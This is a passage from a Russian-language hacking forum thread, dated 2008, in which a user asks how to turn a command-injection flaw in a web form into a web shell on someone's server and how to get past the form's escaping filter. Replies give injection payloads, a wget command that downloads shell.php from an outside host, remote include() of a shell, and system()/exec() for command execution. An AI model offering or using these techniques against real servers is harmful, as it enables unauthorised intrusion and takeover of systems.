ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Как создать файл имея возможность выполнить команду интерпретатора?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Как создать файл имея возможность выполнить команду интерпретатора?
  #1  
Старый 27.08.2008, 11:58
n0mie
Новичок
Регистрация: 28.05.2008
Сообщений: 6
Провел на форуме:
96880

Репутация: 0
Question Как создать файл имея возможность выполнить команду интерпретатора?
Есть уязвимость - не фильтруются параметры формы, что позволяет выполнить команду интерпретатора. Например, вот так:
param1=180%3Bcp+include%2Ffile1.txt+include%2Ffile 2.txt%3B
после этого файл копируется. Моя задача - получить шелл на сервак, для этого пытаюсь перенаправить вывод, что-то типа
param1=180%3Becho+test%3Einclude%2Ffile.txt%3B
(%3E - это ">")
Это не работает =( Файл не создаётся. Не пойму в чём дело.. Пробовал делать touch 123 - создаётся, а всё что содержит %3E ('>') не работает.
Вопрос - как заставить работать перенаправление вывода или, быть может, есть другой способ имея возможность выполнить команду интерпретатора повесить шелл? Можно, конечно, попробовать скачать файл, но как-то это не универсально..
 
Ответить с цитированием

  #2  
Старый 27.08.2008, 14:26
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию
2n0mie,

Код:
echo '<? echo("qwerty"); ?>' >> omgwtfbbq.php
 
Ответить с цитированием

  #3  
Старый 27.08.2008, 14:30
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
copy('remote file','localfile');
__________________
..
 
Ответить с цитированием

  #4  
Старый 27.08.2008, 14:56
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию
А, точно, можно еще просто слить файл из инета:
Цитата:
wget -O /some_folder/shell.php http://site.com/shell.txt
 
Ответить с цитированием

  #5  
Старый 27.08.2008, 15:15
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Цитата:
Сообщение от Nek1t  
А, точно, можно еще просто слить файл из инета:
Не подскажешь ли, давно в пхп появилась функция wget?
__________________
..
 
Ответить с цитированием

  #6  
Старый 27.08.2008, 16:25
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию
Гмм, стоп. Я че-то не понял, имеется ввиду выполнение Php-кода или команд на серве? :d А то я из поста автора не понял =\
 
Ответить с цитированием

  #7  
Старый 27.08.2008, 17:50
n0mie
Новичок
Регистрация: 28.05.2008
Сообщений: 6
Провел на форуме:
96880

Репутация: 0
По умолчанию
Я могу выполнить команду интерпретатора (cmd/csh/etc), а не пхп код. Как раз выполнить пхп код я и хочу )
Можно, конечно, скачать файл с помощью wget/fetch, но хочется универсального решения, т.к. движок бывает и на винде и на юнихах..
Перенаправление в файл не работает, т.к. фильтруется вот таким образом:
$QWE = array('&' => '&amp;', '"' => '&quot;', '<' => '&lt;', '>' => '&gt;', '%26' => '&amp;', '%22' => '&quot;', '%3C' => '&lt;', '%3E' => '&gt;','%27' => ''', "'" => ''');
$_POST[$key] = strtr(stripslashes($value), $QWE);
Возможно есть способ обойти такой фильтр, чтобы > не поменялось на &gt;?
 
Ответить с цитированием

  #8  
Старый 27.08.2008, 19:33
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Question
n0mie
Универсального кроссплатформенного решения боюсь нет

Дык, wget'ом получилось залить?

.Slip, я был прав!
Последний раз редактировалось Nek1t; 27.08.2008 в 19:55..
 
Ответить с цитированием

  #9  
Старый 28.08.2008, 00:56
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Nek1t
видишь разницу между /bin/bash и интерпритарором php

2TS
не обязательно его копировать на сервер ты можешь его исполнить с удаленного сенрвера функцией include() require() require_once() и так далее залив на свой сервак шелл в plain_text например в .txt

Получить шелл ты можешь функцией system() exec() passhru() и так далее.
php.net тут справочник по функциям.

------------------------

update
мда...
Последний раз редактировалось [ cash ]; 28.08.2008 в 01:00..
 
Ответить с цитированием

  #10  
Старый 28.08.2008, 12:04
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Arrow
[ cash ]
ТС несколько путает интерпритатор PHP и /bin/bash.

Так вот насколько я понял, все таки имеется ввиду выполнения комманд /bin/bash
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Установка Windoze глазами линуксоида (100% факты) nerezus Болталка 47 16.10.2005 15:06
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
Использование .htaccess foreva Чужие Статьи 0 07.02.2005 13:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ